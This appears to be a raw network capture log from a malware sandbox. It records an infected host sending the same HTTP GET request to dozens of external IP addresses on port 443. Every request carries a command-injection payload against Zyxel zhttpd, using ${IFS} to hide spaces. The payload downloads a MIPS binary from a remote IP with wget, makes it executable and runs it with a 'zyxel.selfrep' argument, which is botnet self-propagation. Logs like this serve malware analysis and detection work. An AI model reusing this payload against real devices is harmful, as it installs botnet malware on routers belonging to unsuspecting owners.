                                                  Jan 19, 2024 18:24:10.350300074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7973192.168.2.1335678172.188.167.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350326061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7974192.168.2.1340728177.229.227.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350370884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7975192.168.2.135202451.32.18.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350389957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7976192.168.2.135141442.213.88.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350442886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7977192.168.2.1346686126.162.16.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350481033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7978192.168.2.134592486.95.172.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350528002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7979192.168.2.135776832.17.11.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350581884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7980192.168.2.1345772197.96.208.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350631952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7981192.168.2.133369079.95.104.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350670099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7982192.168.2.135042889.35.126.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350719929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7983192.168.2.1359410190.161.161.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350826979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7984192.168.2.134691891.169.118.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350867033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7985192.168.2.1339358192.56.0.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350898981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7986192.168.2.1336254188.13.84.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350934982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7987192.168.2.134982057.140.172.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350996017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7988192.168.2.1360080124.90.207.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351026058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7989192.168.2.1355496178.96.82.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351067066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7990192.168.2.134484032.149.165.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351124048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7991192.168.2.1358474123.67.50.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351166964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7992192.168.2.1338014182.183.174.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351196051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7993192.168.2.1357722204.114.216.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351228952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7994192.168.2.1341410169.98.2.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351277113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7995192.168.2.134360468.60.29.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351313114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7996192.168.2.1339656177.147.71.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351345062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7997192.168.2.133389061.232.31.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351385117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7998192.168.2.1351452124.196.63.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351407051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7999192.168.2.136012051.253.53.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351469994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8000192.168.2.135940619.220.143.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351501942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8001192.168.2.1359592187.29.252.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351557970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8002192.168.2.1346682157.112.231.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351593971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8003192.168.2.1345328171.68.219.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351630926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8004192.168.2.1360516140.33.72.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351656914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8005192.168.2.1345234134.128.71.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351705074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8006192.168.2.1352928196.4.214.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351737976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8007192.168.2.134815271.76.239.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351778030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8008192.168.2.133597065.225.31.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351831913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8009192.168.2.135060251.211.198.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351880074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8010192.168.2.135780080.245.50.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351921082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8011192.168.2.134313478.27.214.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351953983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8012192.168.2.13486148.154.83.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.351989031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8013192.168.2.135504093.89.92.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352052927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8014192.168.2.1333688180.63.0.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352104902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8015192.168.2.134417068.53.20.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352133036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8016192.168.2.13455388.252.118.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352166891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8017192.168.2.135334614.203.249.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352226019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8018192.168.2.1341220172.70.162.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352253914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8019192.168.2.1345758175.162.193.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352310896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8020192.168.2.1358790164.48.51.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352355003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8021192.168.2.13442582.56.134.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352402925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8022192.168.2.1354748192.188.131.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352416992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8023192.168.2.1344198208.179.213.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352471113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8024192.168.2.1346986203.64.198.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352490902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8025192.168.2.1342520102.215.57.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352538109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8026192.168.2.1340304218.81.52.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352576017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8027192.168.2.133839262.102.253.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352607965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8028192.168.2.133475871.55.60.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352652073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8029192.168.2.133317450.94.159.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352699041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8030192.168.2.135752412.89.77.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352750063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8031192.168.2.1341032164.133.141.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352780104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8032192.168.2.134728662.105.224.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352838039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8033192.168.2.1342898169.109.86.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352850914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8034192.168.2.1345948134.157.234.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352885962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8035192.168.2.1359974150.129.24.188443
                                                  TimestampBytes transferredDirectionData
